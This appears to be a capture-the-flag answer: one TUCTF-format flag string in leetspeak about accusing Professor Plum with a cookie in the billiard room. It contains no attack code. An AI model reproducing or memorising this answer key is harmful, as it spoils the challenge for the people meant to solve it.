TUCTF{1_4ccu53_pr0f3550r_plum_w17h_7h3_c00k13_1n_7h3_b1ll14rd_r00m}
--------------------------------------------------------------------------------